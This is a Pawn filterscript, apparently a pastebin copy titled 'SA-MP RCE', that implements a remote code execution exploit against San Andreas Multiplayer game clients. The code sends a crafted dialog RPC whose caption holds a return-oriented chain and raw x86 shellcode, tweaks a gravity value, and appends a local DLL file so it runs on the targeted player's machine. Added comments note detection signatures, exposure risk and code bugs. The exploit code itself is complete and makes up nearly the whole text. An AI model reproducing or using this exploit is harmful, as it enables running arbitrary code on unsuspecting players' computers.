SA-MP RCE

Feb 24th, 2024
  1. // © blast.hk
  2. #define FILTERSCRIPT
  3. #include <a_samp>
  4. #include <Pawn.RakNet>
  5.  
// RakNet RPC ids used by this script. Both are server->client RPCs; the
// numeric ids are taken as given on the page and are not cross-checked here
// against a protocol table.
new const RPC_ShowDialog = 61;      // dialog RPC: id, style, caption, two buttons, text
new const RPC_ScrSetGravity = 146;  // gravity RPC: a single 32-bit float
  8.  
// Contents of the dialog "text" field (sent with BS_WriteCompressedString in
// OnFilterScriptInit): 132 spaces followed by the bytes 0x84 0x39 0x86. The
// final 0x00 is the Pawn string terminator; read little-endian together with
// the three bytes before it the value is 0x00863984. The page does not say
// what that value is on the client side, and it is not interpreted here -
// it is build-specific data that belongs to the chain in payload2.
new payload1[] =
{
//          +0    +1    +2    +3    +4    +5    +6    +7    +8    +9   +10   +11   +12   +13   +14   +15
/* 000 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 016 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 032 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 048 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 064 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 080 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 096 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 112 */ 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
/* 128 */ 0x20, 0x20, 0x20, 0x20, 0x84, 0x39, 0x86, 0x00 // three data bytes + string terminator
};
  22.  
// Contents of the dialog "caption" field (113 bytes, written one cell per
// byte in OnFilterScriptInit). Per the original author's comments the first
// 36 bytes are a return-oriented chain built from fixed 32-bit addresses in
// the client image (pop-register gadgets, a `rep movsd` gadget, a final
// return into the copy destination), and the remainder is raw x86 machine
// code. Everything here is tied to one specific client build; on any other
// build the addresses do not line up and the most likely outcome is a
// client crash rather than code execution.
//
// Defender's note: a dialog caption made of non-printable bytes (0x15 0x27
// 0x40 0x00 ...) has no legitimate use, so binary content in this field is
// a straightforward signature for a protocol-level filter or IDS rule.
new payload2[] =
{
    0x15, 0x27, 0x40, 0x00, // pop ecx gadget
    0x37, 0x00, 0x00, 0x00, // ecx value
    0x8D, 0x2E, 0x40, 0x00, // pop edi gadget
    0x00, 0x60, 0x86, 0x00, // edi value
    0xE6, 0x2E, 0x5B, 0x00, // rep movsd gadget
    0x00, 0x00, 0x00, 0x00, // edi value
    0x00, 0x00, 0x00, 0x00, // esi value
    0x00, 0x60, 0x86, 0x00, // ret to dst
    0x00, 0x00, 0x00, 0x00, // pad

    // raw machine code (77 bytes) - not annotated here on purpose
    0x8D, 0xA5, 0xD8, 0xFE, 0xFF, 0xFF, 0x8B, 0x45, 0x3C, 0x2D, 0x18, 0x01, 0x00, 0x00, 0x8B, 0x08, 0x8B,
    0x50, 0x08, 0x8B, 0x70, 0x0C, 0x83, 0xC1, 0x07, 0xC1, 0xE9, 0x03, 0x83, 0xC2, 0x07, 0xC1, 0xEA, 0x03,
    0x29, 0xD1, 0x01, 0xD6, 0x51, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x51, 0x6A, 0x00, 0xA1, 0xA4,
    0x81, 0x85, 0x00, 0xFF, 0xD0, 0x89, 0xC7, 0x59, 0xF3, 0xA4, 0xFF, 0xD0, 0x5F, 0x5E, 0xB8, 0x01, 0x00,
    0x00, 0x00, 0x5B, 0x89, 0xEC, 0x5D, 0xC2, 0x08, 0x00
};
  41.  
  42.  
// Pre-built dialog RPC: assembled once in OnFilterScriptInit, sent as-is to
// each target in PerformRCE, freed in OnFilterScriptExit.
new BitStream:payload_bs;

// Staging buffer for the raw contents of "test.asi" read in OnFilterScriptInit.
// 21111 cells of 4 bytes = 84444 bytes is the largest file that is accepted.
new payload_array[21111];
  46.  
// Builds the dialog RPC once at load time. The writes below follow the dialog
// RPC's field order (id, style, caption, left button, right button, text);
// the caption and text fields carry payload2 and payload1 instead of display
// strings, and the raw bytes of "test.asi" are appended after the normal
// fields.
//
// Risk: every client this packet is sent to (PerformRCE) receives attacker
// chosen machine code plus a DLL image from the server's file system. A
// player cannot tell a server running this from a normal one before
// connecting, so the exposure is "any vulnerable client that joins". On the
// client side the mitigation is a build that bounds-checks the dialog
// fields; on the network side, dialog RPCs that are far larger than any
// plausible dialog, or whose caption is binary, are the detectable part.
public OnFilterScriptInit()
{
    payload_bs = BS_New();
    BS_WriteUint16(payload_bs, 1); // dialog id
    BS_WriteUint8(payload_bs, DIALOG_STYLE_LIST); // style
    BS_WriteUint8(payload_bs, sizeof(payload2)); // caption length: one byte per cell, so cell count == byte count (113)
    for(new i = 0; i < sizeof(payload2); i++) // caption: the chain in payload2, byte by byte
    {
        BS_WriteUint8(payload_bs, payload2[i]);
    }
    BS_WriteString8(payload_bs, ""); // left button
    BS_WriteString8(payload_bs, ""); // right button
    BS_WriteCompressedString(payload_bs, payload1); // text

    // align: move the write cursor to a whole-byte boundary so the raw file
    // data appended next starts byte-aligned (presumably PR_BITS_TO_BYTES
    // rounds up; if it rounded down the last partial byte would be overwritten)
    new offset;
    BS_GetWriteOffset(payload_bs, offset);
    BS_SetWriteOffset(payload_bs, PR_BYTES_TO_BITS(PR_BITS_TO_BYTES(offset)));

    // dll: the whole file is appended as 32-bit words after the dialog fields.
    // SA-MP file natives resolve paths under the server's scriptfiles directory.
    // NOTE(review): the fopen result is never checked - if "test.asi" is
    // missing, flength/fblockread/fclose all run on an invalid handle. The
    // division payload_len / 4 also truncates, so the trailing 1-3 bytes of
    // a file whose size is not a multiple of 4 are silently dropped.
    new File:fi = fopen("test.asi");
    new payload_len = flength(fi);
    if(payload_len > sizeof(payload_array) * 4)
    {
        printf("ERROR! Not enough space to read! %d needed", payload_len / 4); // prints the needed cell count, not bytes
    }
    else
    {
        fblockread(fi, payload_array); // reads up to sizeof(payload_array) cells; return value unchecked
        printf("SUCC READ PAYLOAD of %d bytes", payload_len);
        for(new i = 0; i < payload_len / 4; i++)
        {
            BS_WriteUint32(payload_bs, payload_array[i]);
        }
    }
    fclose(fi);
}
  84.  
// Releases the RPC bitstream built in OnFilterScriptInit when the
// filterscript is unloaded.
public OnFilterScriptExit()
{
    BS_Delete(payload_bs);
}
  89.  
// Command hook: "/aasd1" (compared case-insensitively) fires the chain at
// the player who typed it. There is no permission check, so any connected
// player can trigger it - against their own client only, since playerid is
// the sender.
public OnPlayerCommandText(playerid, cmdtext[])
{
    if(!strcmp("/aasd1", cmdtext, true)) // strcmp returns 0 on match; third argument = ignore case
    {
        PerformRCE(playerid);
        return 1; // handled
    }
    return 0; // not ours; let other scripts see it
}
  99.  
// Fires the chain at one client, in four steps:
//   1. push a specific 32-bit pattern into the client's gravity value. The
//      Float: tag override sends the integer bits unchanged - this is not a
//      gravity in any physical sense. Why the chain needs it is not stated
//      on the page and is not inferred here.
//   2. send the pre-built dialog RPC (payload2 / payload1 / file contents).
//   3. close the dialog again so nothing stays on screen.
//   4. restore the normal gravity (0.008 is SA-MP's stock default).
PerformRCE(playerid)
{
    SetPlayerGravity(playerid, Float:0x3C658B90);
    PR_SendRPC(payload_bs, playerid, RPC_ShowDialog, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4);
    HidePlayerDialog(playerid);
    SetPlayerGravity(playerid, 0.008);
}
  107.  
// Sends the gravity RPC to a single player. The RPC is hand-built through
// Pawn.RakNet, so whatever bit pattern the caller passes goes on the wire
// unchanged - see the tag override in PerformRCE.
SetPlayerGravity(playerid, Float:gravity)
{
    new BitStream:bs = BS_New();
    BS_WriteFloat(bs, gravity); // RPC body is one 32-bit float
    PR_SendRPC(bs, playerid, RPC_ScrSetGravity, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4); // trailing 4: presumably the ordering channel
    BS_Delete(bs);
}
  115.  
// Closes whatever dialog the client is showing by sending a dialog RPC with
// id -1 (0xFFFF on the wire), the same convention ShowPlayerDialog(-1) uses
// server-side. The placeholder strings only keep the RPC well-formed.
HidePlayerDialog(playerid)
{
    new BitStream:bs = BS_New();
    BS_WriteUint16(bs, -1); // id: -1 means "close current dialog"
    BS_WriteUint8(bs, DIALOG_STYLE_MSGBOX); // style
    BS_WriteString8(bs, " "); // caption
    BS_WriteString8(bs, ""); // left button
    BS_WriteString8(bs, ""); // right button
    BS_WriteCompressedString(bs, " "); // text
    PR_SendRPC(bs, playerid, RPC_ShowDialog, PR_LOW_PRIORITY, PR_RELIABLE_ORDERED, 4);
    BS_Delete(bs);
}
  128.  